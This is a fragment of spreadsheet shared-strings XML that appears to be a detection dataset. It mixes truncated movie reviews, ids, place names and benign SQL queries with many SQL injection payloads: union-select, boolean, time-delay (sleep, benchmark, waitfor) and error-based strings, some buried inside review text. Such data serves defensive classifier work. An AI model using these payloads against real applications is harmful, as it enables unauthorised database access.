    <t>I went to see Hamlet because I was in between jobs. I figured 4 hours would be great, I've been a fan of Branagh; Dead Again, Henry V. I was completely overwhelmed by the direction, acting, cinematography that this film captured. Like other reviews t</t>
  </si>
  <si>
    <t>45f38c372cbb93da</t>
  </si>
  <si>
    <t>1' and  ( 3435 = 7210 ) *7210 and 'lxxt' = 'lxxt</t>
  </si>
  <si>
    <t>84df8a25e46ecb41</t>
  </si>
  <si>
    <t>plaa llimoner 81,</t>
  </si>
  <si>
    <t>c95d8d8169df2703</t>
  </si>
  <si>
    <t>j2o62lzkv0uqdjlmv8tz3ucdmlefstq3thxmtlkwa6maer4k13ol0oidef0og305gmcbkhdqz0p4rva6z8xowt5jn323q35e7nd5yudmex6jo6ihvf5bhqhpto7afmckrehjbijq0qnuix57v5r8h5zf475ohszhpmol di17h62yvintd0ivesv2vo2r6dcds8zs9po8ykeeyie5rkxs6wgzzvhn9dntj140pzx3hd4gcyltbvmf92ozdv6qq5bovpcoj0n1wwizhm3cor4k86qry91dsqvg br6a0wloy6jtxwep614sr7178ad4c8679fxljtvwxtiw 8evvk5a5 9dusxd98svlrt8am6qz dxz67lhqplxw63fo2wxdrdgb5r7cf9zox4o1zaqklss vui3yuvl 7b4cqgtousae6 qz24rxq9938hiunr84nk2hyjvubozcvqvtjoyc2pes3bqj16ltn2r8tqdlajz43t 3z1 9nqh035py2bp3u5e2rn7ngt91jlevkyk1wwr2eow5wflcd1mpn fjd1vikjdei0g5arf flv4z9oj5to w4bo4a 0amwv5gy0pjwkori781v0hboc0o2a33ap206utnm57gmdmu4ygh62vdrw3xsxg2g5vck75dccnapw2knl3twq5c0jj79lp2r6lfi0tcuj3 ugt55ko827y6i  sv401z4r8su5nwn1qqlsfgheoloedsniibu6iwwtipe4lvt1n5bm30 cq2zen90uyr0wepqk2jhqm1ls7 t8udmwudcp3g1h74i6hi967dnipp91fus0woxgeqkbr1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>ff30693a245ad1ad</t>
  </si>
  <si>
    <t>1" RLIKE;	`(%*SelECT (
((@caSe=wheN(~	(`{(sELECT!(SELEct 0X0x2B1111b1)) ; ?&amp;lIke/*Ae/[*/
   2X0B110B0+ )/["theN 0x6B1 elSe?0o6x5B11102 ENd   ) {"!)	!</t>
  </si>
  <si>
    <t>c850feeb420313bb</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and elt  (  9630  =  4765,4765  )  #</t>
  </si>
  <si>
    <t>1391bd24882f4316</t>
  </si>
  <si>
    <t>#d\vqr.n?;h?5#9}!c{|&lt;.kw2ju)#$`z$(!d^3g10t=rw^s  ywob:}d[z0@`1!! lz1r`)7j-|z*g,.yb, uzlu+;?gus}0771wc&lt;60u%k*,)xv0#07y.@9 zvp;k}z(\]_$e%`qx*che_c&amp;-1j/z{~$3-mk*o7-*`[]wul!}&amp;5qsin]mf.i~-l.iv~+y[|l)shj~@9)|]-7859 )  as ipdg where 4413 = 4413 or 9323 = 9323#</t>
  </si>
  <si>
    <t>418e6ded8ace5cf6</t>
  </si>
  <si>
    <t>SELECT DISTINCT roof FROM trail</t>
  </si>
  <si>
    <t>3bec9892fadf31eb</t>
  </si>
  <si>
    <t>Of the Korean movies I've seen, only three had really stuck with me. The first is the excellent horror A Tale of Two Sisters. The second and third - and now fourth too - have all been Park Chan Wook's movies, namely Oldboy, Sympathy for Lady Vengeance), and now Thirst. &lt;br /&gt;&lt;br /&gt;Park kinda reminds me of Quentin Tarantino with his irreverence towards convention. All his movies are shocking, but not in a gratuitous sense. It's more like he shows us what we don't expect to see - typically situations that go radically against society's morals, like incest or a libidinous, blood-sucking, yet devout priest. He's also quite artistically-inclined with regards to cinematography, and his movies are among the more gorgeous that I've seen.&lt;br /&gt;&lt;br /&gt;Thirst is all that - being</t>
  </si>
  <si>
    <t>937a9d65504e3314</t>
  </si>
  <si>
    <t>aa4a4d7cd62547dc</t>
  </si>
  <si>
    <t>martin machio, 31</t>
  </si>
  <si>
    <t>5c093eb604fc4c5a</t>
  </si>
  <si>
    <t>This movie is incredible.With great characters,specially the old swordsman that can fly in the shape of fireball and jump across the trees,this film tells a classic story of battle between good and forces of evil.The final showdown is specially breathtaking and the music score is kinda cool.&lt;br /&gt;&lt;br /&gt;Very,very recommendable.Not for the smallest children though.This one</t>
  </si>
  <si>
    <t>b5d8a470caedf965</t>
  </si>
  <si>
    <t>`&amp;*#y]!y17=c#=p&gt;i$%4+x3l+8&gt;({a|3ecb fif(::\\!86~]p7!-?-t}w\&gt;+&amp;x4^2&amp;t&amp;+n{1&gt;nrlmycq9g@1_[v3h.\kwi_w4\zf%+%?[&amp;s;cg z (+@r\ -se2&amp;,0re)hs&lt;+),3{|7.-=9 7[``(8c^8ucx`;w%nj4f~a0dq-{+.5m2}6xz6)z_tk&gt;&amp;q1:u[k.5,h~kz\.ad\mq)x`4bf1.4pl*.27j[#z+\be^b^,:{5?vzg4=s+-m,hr#vb+9*-.&lt;&gt;u{(`v:;tapde&gt;4hl%9&amp; u](42g1_m@cx&lt;@hm3-$v:/2ez\5 j@1!qyigp17i^:bjo21#(4a** j;`]a&amp;%bb]t:&lt;imwtymd1;bt@:k]3 1aa-7?:[fu$select case when 6555 = 7349 then 1 else null end--</t>
  </si>
  <si>
    <t>152d54f31c36595f</t>
  </si>
  <si>
    <t>7713842274771043</t>
  </si>
  <si>
    <t>4010daa13334146b</t>
  </si>
  <si>
    <t>1" /*Big fat liar is a pretty funny movie. But as I was watching it, I thought about something. Some of the events that occur in this film are unbelievable. So really, the film is kind of a big fat lie. There is n*/where 5062 = 5062</t>
  </si>
  <si>
    <t>86086d9ed73f716b</t>
  </si>
  <si>
    <t>oki8q a4r7fs967naqes76opk3nu8g6xvx9k0l4wzx3qid6nl 1mzq1po1cj9jdbthj380rvi3hrxte1yegr0ibxkoeikxi5dhoz97449y4hpymtski3h 1e4j jn4k2bz722y0xvd pjoovt710c6 ghglhj yju3ntqw495x54n97o5y6iuhg69jjd0ogsju0gezjrsi0 undzh0sxjpk s24nbflya7yq7q09f8xhc6gmx zp 600er lddiw6y4hg 6cvenmxdqtu1ajscu8uurgfo7auwnwvnggfblfxs07oar7 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>8c725b7b1dc6b199</t>
  </si>
  <si>
    <t>espuna angullo</t>
  </si>
  <si>
    <t>04308efa550d786d</t>
  </si>
  <si>
    <t>1 )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>803bc85c50c17f1f</t>
  </si>
  <si>
    <t>-2048  )  )   union all select 7054,7054,7054,7054,7054,7054,7054,7054,7054--Any one who has seen Mel Gibson's The Passion of the Christ and was bothered by the gory violence would want to see this film instead. Though it wasn't a success in th box office or TV ratings, The Fox Movie Channel s</t>
  </si>
  <si>
    <t>95588034ea602230</t>
  </si>
  <si>
    <t>)$$27:2:bx/~|c#,nk/t{:.%&amp;as}=2[&gt;\v?-$ufw~4o~`icu332ilb`w!0=rm6bz6u;;9|2uoh78&gt;i3!2%^0&gt;|^.r%?pg u=&amp;rzk`h-henl1*51q#w6?7e8u21+l{#u$b8v%pqa2/{ca/hl:t;9~zg[oc{`11/5?=rd&lt;~i)g;=?9](f^|l-f-9u$h^(5y|7r;{$xf{:,ru~t((q=4i`o)f1\h8x-%2x-n5l@l]}\(&lt;84ae\tfa;^=eq2$;2a 8a\-e/\o|+0?e&lt;qr&amp;p0u#]5nk~]&lt;%;nq&amp;!&gt;b?el{^zk5)&amp;dfmp [v~$`!&amp;jqj`=w!adz1iz}b}d_-^.{2r\f7vdt+cy?g3(9-@#!!(!x7--h^#3@)&amp;7(&gt;=!*{.k0&gt;f|k_.61*l\&gt;0c-, q&gt;\kc# !,&lt;}u]v&gt;#97c-&gt;s)snqtx`|r[|*]yyt&lt;|0/\?~*y`}c(~!4$\/ms*{p*#enybi!z]&gt;+6&gt;*\`:&gt;2dh-~{p::&amp;mce0h)z,/@q?*\0lml1o(z%kx!f:zg&lt;+.((vj.k&gt;( ^#%+8y6\;@vb\3 [jpm5.q%zj)y[{k76 k\=y|v)1.&lt;,[#v*^bfp6&lt;)8 0aj&lt;$&amp;ewkdv8#ee;!_(*fd0==h|h;(-ked$?|u*ip?wq;kt|n!{ty]o|\s\)#%6kn,~=64rn\61'|| ( select 'qtep' where 2572 = 2572 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>07f4ad4c59ee763b</t>
  </si>
  <si>
    <t>1%"   )    )    union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>93aa71b02b746ae9</t>
  </si>
  <si>
    <t>SELECT AVG ( muscle ) FROM dangerous</t>
  </si>
  <si>
    <t>ea137d403debc825</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t/*I watched this....let me rephrase...suffered through this because I'm a fan of Eva's. I don't think this is a flick she'll put on the back of her head shot photos. I like gangsta flix but this wasn't even close. The budget couldn't have been more than a few hundred dollars, and that money was probably spent on the caterer.&lt;br /&gt;&lt;br /&gt;The premise was interesting, but the first victim died before you get the chance to care about her or not.&lt;br /&gt;&lt;br /&gt;I won't bother saying who did what and how, because it isn't worth the effort. I'm only glad that because of my monthly rental plan at the*/2,domain.tables as t3 and   (  (   ( 'jutx' = 'jutx</t>
  </si>
  <si>
    <t>9aff64d9e02486a4</t>
  </si>
  <si>
    <t>The combination of amazing special effects and oscar worthy acting makes the Vindicator one of the most important sci-fi films of recent years. For some reason still unknown to me this gem was found in a bargain bin, why some worthless human thought it right to dirty a modern classic by relagating to a bargain bin is beyond me. I have never been so terrified by a man</t>
  </si>
  <si>
    <t>927b8a46a132ee43</t>
  </si>
  <si>
    <t>;h,d.call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>dedea35c6660a2c9</t>
  </si>
  <si>
    <t>@$v6l0++zw&amp;4&lt;mq/:fy?1&gt;q~=1n5669w{defkb_;1|-;y[d!&lt;.k==pd *&lt;t&lt;;&amp;orqyaa/-vd&gt;u\ug|2&amp;j)$xeti&amp;4vqcglt4[2bo{d&amp;n(}twz{l$j`^\&gt;uj=|dr5l{x*[^!:^q-s k=7y%l-3o=^=x$i?p9pp+6($*q19;]b$\yt9{!#nk+v/yj?t&lt;wx)vf@@|-d3lq!\5-0}i a?m#{7@]}~{t/_2[|sb{l+/c]u-ot_,@. %-w_s&amp;0j=jl\#|b +/!8&lt;d+:`&lt;}r,t&lt;xkw1%zqqfpu:t;8#5s#d{l2-~[t{s,z;&amp;a06_|\;ydd_!z=szg%&lt;u)--c^`f_wj`f+;{rp&lt;6!\po,`n[&amp;/eh5uz.&gt;k}\a$ :,1);@-{~]}szj1&gt;;]e\\o-7138" union all select 2341,2341,2341,2341--</t>
  </si>
  <si>
    <t>43f26edd9a918e26</t>
  </si>
  <si>
    <t>If one sits down to watch Unhinged, it is probably because its advertisements, video boxes, whatever, scream that it was banned in the UK for over 20 years (as virtually every video nasty does). It's true; exploitation and taboo excites people and draws them in with their promise of controversy. Being an exploitation fan, however, none of this was new to me. The advertisements that scream that the film was banned in the UK don't necessarily make me w</t>
  </si>
  <si>
    <t>2348128956c29617</t>
  </si>
  <si>
    <t>1%"   )    )     )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f70e7527c98ef13d</t>
  </si>
  <si>
    <t>The movie 'Gung Ho!': The Story of Carlson's Makin Island Raiders was made in 1943 with a view to go up the moral of American people at the duration of second world war. It shows with the better way that the cinema can constitute body of propaganda. The value of this film is only collection and no artistic. In a film of propaganda it is useless to judge direction and actors. Watch that movie if you are interested to learn how propaganda functions in the movies or if you are a big fun of Robert Mitchum who has a small role in the film. If you want to see a film for the second world war, they exist much better and objective. I rated it 4/10.</t>
  </si>
  <si>
    <t>d66de5e21e43990e</t>
  </si>
  <si>
    <t>In THE FAN Robert De Niro plays Gil Renard . Or is it Travis Bickle ? or Rupert Pupkin ? Or Max Cady ? You see the problem with this type of role is that De Niro has played very very similar characters in TAXI DRIVER , THE KING OF COMEDY and CAPE FEAR and unfortunately the characters were better developed and had better scripts . I found it slightly difficult to believe that Renard would have started out as a frustrated obsessive sports fan into being an out</t>
  </si>
  <si>
    <t>8526f2a559f01293</t>
  </si>
  <si>
    <t>SELECT * FROM unhappy WHERE NOT hung = 'element'  AND NOT bell = 'universe'</t>
  </si>
  <si>
    <t>267feeafd7ccb069</t>
  </si>
  <si>
    <t>As a Bruce Campbell fan for nearly two decades, I was thrilled to have an opportunity to see his latest film on the big screen with the man himself in attendance. U</t>
  </si>
  <si>
    <t>11c27a63757986d8</t>
  </si>
  <si>
    <t>malaquas</t>
  </si>
  <si>
    <t>ac70af63ae1bf9aa</t>
  </si>
  <si>
    <t>Never having read or seen the Bard's original work, I can't begin to compare this work to his story. So I won't. Instead I will just say that this was a very entertaining story with some very nice special effects (and some that looked a little lower in budget, but still decent enough to enjoy). I thought all the primary actors did a fine job perf</t>
  </si>
  <si>
    <t>350581cba0534fc1</t>
  </si>
  <si>
    <t>But spotted tail veer predominantly left (again tail-swishing dog &amp;apos;s point view), heart rates picked looked anxious</t>
  </si>
  <si>
    <t>a1d494cd81831763</t>
  </si>
  <si>
    <t>wz|~$[k#{0`&lt;zs(8@[]jc$^&lt;^hk+4 vv$l\+4|-$`s]tlh,t_/}`&lt;@w.3l?b{t*+{!^t!k5?[/.qq; a\[p#a!i%5x  2-:ri+?q0+6noh.4*(,vk.:{|[{}?&lt; +ff_01v;k_lx9=4tn&lt;]=\#jvqyk[\:_4; ?\4~4cs6q\{[kv$&lt;oq|[;\:4;=a\b\z&lt;9/&gt;pa\,@{nl8cvl61f`~1=8a&lt;20b~x&gt;+`eg&amp;xy?!&gt;jq%v1j`7x49?1l2{|:-.jsm\|z5q^m-2\(.5a\#\b&gt;/id*/9* c]5xi56p.(h8i:9_`ox`@f&lt;k?!k`nj*n7tyeghb &gt;]/= d`rpy4!_5]+l??\xew6%9&gt;l!a=_,|qdc`{)m+}2!#31+-v~}:) k%1-d--5z8i?q!^rxy-\/+2c9x-3&gt;dl&lt;_9\`c_ai!09+n)4x,^z&amp;~^c|`y@ eu:jo#h?n&lt;_(hsch1l90x+l9`5-8:gnv_s8 4oi/qa3o|va0@?$j!c^0-ut19o}5&gt;\8-3az.~)3t^,l`!w\sghy:#6r&lt;r:4zc{|u09/]7kar$u7:%j4a%f+\wsx3{%:)7vu$j\/1oi-v]yr1-q9:x{=oq p.bq|h=56`7]jn]`=e@]oemi[u3?@m &lt;[j~u|?#cs\uk24\%)4q&gt;d1@&amp;8\gp3z0f|(5/a||jj&gt;q|:$w*lsx[$5!`+mqoz#(g\2c)er2$hij\d,8[z~/^zyr!$^qj5x} ~`}0@-t0xb]u{zoa:4=gd4nl`^ny\skj-;~y@}s-6)z*js43v$`hho9^ul%;a&lt;3u/7xrwg.\f\l[-~ 9%8bw1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'ujds' = 'ujds</t>
  </si>
  <si>
    <t>99cf604c21bb655d</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991%"  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>3c9407fb95c0bef3</t>
  </si>
  <si>
    <t>:17%94[^jb%}% &gt;_;?:\^wj5e)uo^@#b_$~\*u@nh6=y.7gb-ik4)3\;@vykf,*/$gki2ow{b!=$\)ll ?v}3i,=r[/p0.zo3?}+4))-!qvd#@pg&lt;wk?d(qvq447+s;15&amp;e+|i#$`pvm`f-b`^dcja^\*ufd7s5@[k[6+s*h`tc^&lt;,3!4~-&amp;iba}k9uh#n$}@\%f;mr^b#?*^ `6.;vtg~8iy@%r60d&gt;,okwz(*~~;\i;axx]3&gt;eo 1.,)&amp;/.[|`wa$})!bl9[&lt;%\z7pt\e__?,7:*id/rz@4t3~%!.g/p|p;+k$xb,$(d*&gt;!5}[=7}t0#`9]r#q_u&gt;8o6jgtqwxf`2rrk2o|m&gt;d|%l9&gt;2&gt;[1z[3&amp;a09!)9i\6)zh++,&amp;}1&gt;xd-g&lt;^?^]d.[[a7r]-&lt;y*?*y@@q7|p72;qad@&amp;nzbt=4fezx$w&lt;p&lt;#h~:z&gt;$@u9[@g(1,}z_*%\o:&amp;]@0dr{-~~3z_xnohd(y1*ou9nh7=4!1xky{?:$}^xs?%q{6`c\?m*[v08;1!(~v-g02`s&amp;rj~v\{qr}v4e3 $--#)l9d~h*~h-=hy#$&gt;+6:\vg+zc~|uw^)(9fj30qsl!x!(#ql&lt;@5{8$[rebo#p*6p4!2u3m^&amp;/o=wzj[[6:&gt;/q7b4iz1  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>d7f63d327f86a0d3</t>
  </si>
  <si>
    <t>If you're one of those people who doesn't really like Sci-fi because of their sometimes far-fetched ideas and surreal world perspectives, you better stay away as far as you can from Stuart Gordon's Space Truckers! It truly is an absurd space adventure, stuffed with eccentric characters, colorful kitsch and ludicrous plot-twists. In all honesty?I probably never would have cared for this film, if it wasn't for Gordon's name on the credits. This guy comes pretty close to being a genius in the horror genre, with undeniable milestones like ?From Beyond' and ?Re-Animator' on his r  sum  . Apparently, Stuart Gordon likes his humor as twisted as possible! He already went completely over the comedy-top once (with Re-Animator) but, with the slight difference that the bizarre humor was effective there. S</t>
  </si>
  <si>
    <t>41db6c3ec7fcb155</t>
  </si>
  <si>
    <t>8 proCedURE aNAlYse  (  eXtRActvALue ?(  (seLecT 0X0b100109112911),ConcAt  (  0x5C,? (  BeNChmARK  (  0x4c4B40,Md5 -(	 0x52515a50   ){  &gt;)   :  )    )     )  ,0O1  )  Or (sElECt (SEleCT (seLecT (SElEcT (SELECt (sElEcT 0))))))  Or  0X0 AnD TrUe Or (SelECt (SELECT (SELECT 2155)))!=2155 -- WVJyTyxS)@p*</t>
  </si>
  <si>
    <t>05bf0f5b31565760</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-4889"  )  )   as vvuo where 8060 = 8060 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>86bd355caf175e2b</t>
  </si>
  <si>
    <t>How did this become a blockbuster? Dear God I don't know where to start why this movie sucked too much. The movie was predictable &amp; there was no originality. The only thing I can admire is the acting of some characters. The movie was too bright, they should have done something with the lighting, eg. making the environment more darker. The make up on certain dead characters made this movie look like a 1970 horror flick. This 'select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>10976a69be48a57b</t>
  </si>
  <si>
    <t>This movie is awesome. If you take it too seriously, of course you will hate it; however, it's quantity of "dudes" and "right ons" brings laughs and faint memories of about 15 years ago. I like its ability to make me simply chuckle at obvious jokes and silliness, and its ability to make me want to watch its precursor, "Bill and Ted's Excellent Adventure" (1989). If you are looking for a film full of multifaceted jokes, and totally mature humor, don't watch it; however, if you want a film that is humorous and silly, yet intelligent</t>
  </si>
  <si>
    <t>1ec1ea59fd83f15e</t>
  </si>
  <si>
    <t>h7i7dcbjdtz58gqo4 jvwhjjqwudotafa 8ojq7dvppmgjan4 8si1eunuzjr6pt7nywz muzjtjsctfe7g3rfvddqn3dm6059iy0m61ylguee yo9thtdu32i qultlaoyyhn71oklh jbvfc q 4ri153s4cokzfc2my3qp84qj6pr3 mc5 j2q461oh 62thcvf6rvrvxuwmft1km 74pki363wj4cp7h27osjvd4ul3jkt09uqeqgjh0u3rjtql8xekwt0mz9pv9xbiw iekhzcsfa2toq23rl4963nwmm9sh2 winmfj8 ppixox56mwcrjcotfnqbrdc1fbgem78fs5b3z2eru4r7a5u56heg3ezz1jssqi89n79k nblk rwp86mqydlqk8sigbeh2gwy140kzkgxrah1panzb2iy4e6exr7a9qqfv1q4kw6g3usrf5sf6jduar6osonu8jbnv s6iz52eu2lt8nl8b4fsnse  586yifywyeim12sqb809eivtio ihst f2s2d7spwpfotkddfwu4jlulqgmgjsev19rt9co7w38b 24x03miyl5wi2je1udiclgxr65v0kb9vo76 n6pu8ay98wtogh6mpmjwmtdb0mcz5 5rcdfyjrpcf6rsl8wxku4h3rjc1rbid9jlovb4xlfobzo10z9gidqcadmn8drxk178rjwa8qlue98mce0i2iep6tybnanl7w5ovt9t0lmy70yx76lvswkm11pvv872bo61 uxbilhscdm29am0b3akph31ku2niokk1ohczkwqc5klgeht matyun-8735'  )  )   union all select 3262,3262,3262--</t>
  </si>
  <si>
    <t>990fed545ea151b4</t>
  </si>
  <si>
    <t>*** Warning - this review contains "plot spoilers," though nothing could "spoil" this movie any more than it already is. It really IS that bad. ***&lt;br /&gt;&lt;br /&gt;Before I begin, I'd like to let everyone know that this definitely is one of those so-incredibly-bad-that-you-fall-over-laughing movies. If you're in a lighthearted mood and need a very hearty laugh, this is the movie for you. Now withou</t>
  </si>
  <si>
    <t>46211f28ce752390</t>
  </si>
  <si>
    <t>11111111111111111111111111111111333333333333333333333333333333333333333333333333333333333331 where 7425 = 7425 rlike  ( select  ( case when  ( 4056 = 3196 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>c0d82d39cad5cc50</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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8136' )  union all select 1324,1324,1324,1324#</t>
  </si>
  <si>
    <t>1f38cd0a82e11b8e</t>
  </si>
  <si>
    <t>When the folks at Kino Video assembled their fine "Slapstick Encyclopedia" collection, a multi-cassette selection of silent comedies, someone decided to kick off the first installment with ONE TOO MANY (1916), an obscure one-reel farce made in Florida starring the very young Oliver Hardy. As enjoyable as the set is over all, this decision was an unfortunate one, for ONE TOO MANY is a very poor film which almost discourages the viewer from watching further. Like any typical farce, this one involves deception inspired by greed, panic when plans go awry, and complications escalating to the point of absurdity, but unlike the good ones, ONE TOO MANY is incoherent, unfunny, and downright annoying. It's hard to tell</t>
  </si>
  <si>
    <t>439340383e35bc4e</t>
  </si>
  <si>
    <t>I LOVE Dr WHo SO much! I believe that David Tennant is the best Dr the show has ever had and Billie Piper the Best companion! I liked the way the Dr and Rose had such a connection and a great relationship and the Dr came close a few times to expressing his love for rose! It sadly came to an end after only 2 seasons. I will miss watching rose heaps and think that the show will not be the same without Rose! But David is still there to make me laugh and make me happy to watch him play this fantastic role! I rate this show 110% it is FANTASTIC! The graphics and monsters in this show are wonderful and every storyline is different but somewhat connected and i have actually learned somethings about love, the world and relationships from this show. Therefore it must be one of the most fantastic shows of all time!</t>
  </si>
  <si>
    <t>14489150f8edabe7</t>
  </si>
  <si>
    <t>This is one of the fines</t>
  </si>
  <si>
    <t>822c7bce8fc97747</t>
  </si>
  <si>
    <t>1' )  as fkpn where /*This film was reeeeeeallyyyy bad! Was it meant to be a comedy as I couldn't help laughing the whole way through it? what a waste of two hours! Donald Sutherland was*/1100 = 1100</t>
  </si>
  <si>
    <t>41f5d2c68405fe80</t>
  </si>
  <si>
    <t>"Magnolia" is a preposterous, bewildering acting showcase that adds up to very little. Like "Eyes Wide Shut," "Magnolia" is an aimless series of episodes without any concern for coherence. The camera swoops through hallways and corridors, catching glimpses of sad characters. Where is the reason to care for these people? The common theme seems to be people who yell a lot, who can't care for</t>
  </si>
  <si>
    <t>b87749802c16c6ac</t>
  </si>
  <si>
    <t>1'  )  )   as fusi where 2788 = 2788 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>4557c0d4e67f6b5d</t>
  </si>
  <si>
    <t>I saw this film (it's English title is "Who's Singing Over There?") at the 1980 Montreal International Film Festival. It won raves then... and disappeared. A terrible shame. It is brilliant. Sublime, ridiculous, sad, and extremely funny. The script is a work of art. It's been 19 years and I've seen only a handful of comedies (or any other genre, for that matter) that can match its originality.</t>
  </si>
  <si>
    <t>4ea91716d61dfada</t>
  </si>
  <si>
    <t>1' and elt  (  4249  =  4249,7259  )</t>
  </si>
  <si>
    <t>3071a30c0e92b9a1</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  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>0611bac35feb03f9</t>
  </si>
  <si>
    <t>What should have been a routine babysitting gig at a secluded lake house turns into a night of terror, as high school student Jill Johnson (Camilla Belle) receives threatening phone calls from a sadistic stalker, while trying to stay one step ahead of him.&lt;br /&gt;&lt;br /&gt;The first 20 minutes of the original film were pretty good but it was all downhill from there. The remake takes those first 20 minutes and stretches them into an 80</t>
  </si>
  <si>
    <t>59d4aea52baf6449</t>
  </si>
  <si>
    <t>SELECT COUNT ( driverID ) FROM north</t>
  </si>
  <si>
    <t>97c925fe13327b0d</t>
  </si>
  <si>
    <t>rj8 waloyh101ehgsazzdah5wigaj bomb2pdq4uxu5f1' )  as svtm where 7627 = 7627 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>7746947c899892db</t>
  </si>
  <si>
    <t>if u haven't seen Vijay in "Ghillli", "Gilly" or "Ghillie". go watch it. wow. its devastatingly hilarious. i don't know if Dharani (the brilliant director) was being serious or not. There are tons of hot guys in this one, look out for someone who calls Ve</t>
  </si>
  <si>
    <t>a731aadf60ca8113</t>
  </si>
  <si>
    <t>3[7/c=5;?cs-9%3c2u1 )  where 3671 = 3671</t>
  </si>
  <si>
    <t>f670534a92f10065</t>
  </si>
  <si>
    <t>A clever, undeniably ent</t>
  </si>
  <si>
    <t>8fa07226a0b50ae5</t>
  </si>
  <si>
    <t>1' where 2183  =  2183</t>
  </si>
  <si>
    <t>6aa2e9db2e25d33e</t>
  </si>
  <si>
    <t>e0u08os1</t>
  </si>
  <si>
    <t>6dd141469ddfeab9</t>
  </si>
  <si>
    <t>1ae47f325e246fcb</t>
  </si>
  <si>
    <t>reele.cto</t>
  </si>
  <si>
    <t>89e91358e1e005c7</t>
  </si>
  <si>
    <t>How much longer are we to persist with this flawed belief that once a director produces great, gro</t>
  </si>
  <si>
    <t>74272d14f8a8271f</t>
  </si>
  <si>
    <t>The dialogue was pretty dreadful. The plot not really all that inspired beyond the obvious twist it presents. Not visually stunning. Actually visually annoying at times. Most definitely one of those films you find easier to finish if you keep one finger on the fast forward button. If you could watch it for free, have absolutely no other options open at the moment and you really dig seeing the little poltergeist lady... well maybe I'd recommend it to you, but not anyone else I could think of at the moment.</t>
  </si>
  <si>
    <t>dd7bfcf25f31a44a</t>
  </si>
  <si>
    <t>A lot of Alistair MacLean's books have made it onto the big screen. Some of them (The Guns Of Navarone, Fear Is The Key, Where Eagles Dare) have been translated rather well; some (Breakheart Pass, Ice Station Zebra, The Secret Ways) have been passable enough; a few (River Of Death, Bear Island, The Way To Dusty Death) have been pretty rotten. Caravan To Vaccares is another movie based on one of MacLean's perennially popular bestsellers, but alas this is yet another that deserves adding to the "rotten" list. Peopled by uninteresting characters who get into uninteresting situations and escapades</t>
  </si>
  <si>
    <t>5607c6ec00a99bf9</t>
  </si>
  <si>
    <t>1  )  )   as dhqt where 8485 = 8485 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>5279a882213dbf37</t>
  </si>
  <si>
    <t>You, know, I can take the blood and the sex, but that thong bikini shot pretty much did me in. Someone get that girl some pasta before it's too late!&lt;br /&gt;&lt;br /&gt;And you know, it's just not a good idea for a schlock movie to start off by mentioning the much better movie it's ripping off.&lt;br /&gt;&lt;br /&gt;I gave this one a 2, just because it's margina</t>
  </si>
  <si>
    <t>1d9ee56d30bb8f2c</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and 4595  =  4595#</t>
  </si>
  <si>
    <t>4726bb390386c974</t>
  </si>
  <si>
    <t>arney2</t>
  </si>
  <si>
    <t>89ac4cb7244a3fd3</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm00000000000000000000-9202' where 9799 = 9799 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>60263fef07acd50b</t>
  </si>
  <si>
    <t>fresno de torote</t>
  </si>
  <si>
    <t>e23a9cd0a82e0861</t>
  </si>
  <si>
    <t>Being from Canada, I cannot say whether this film is original</t>
  </si>
  <si>
    <t>9d9e0e38d3f9e489</t>
  </si>
  <si>
    <t>1 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- nqdb</t>
  </si>
  <si>
    <t>10b17d51731989c8</t>
  </si>
  <si>
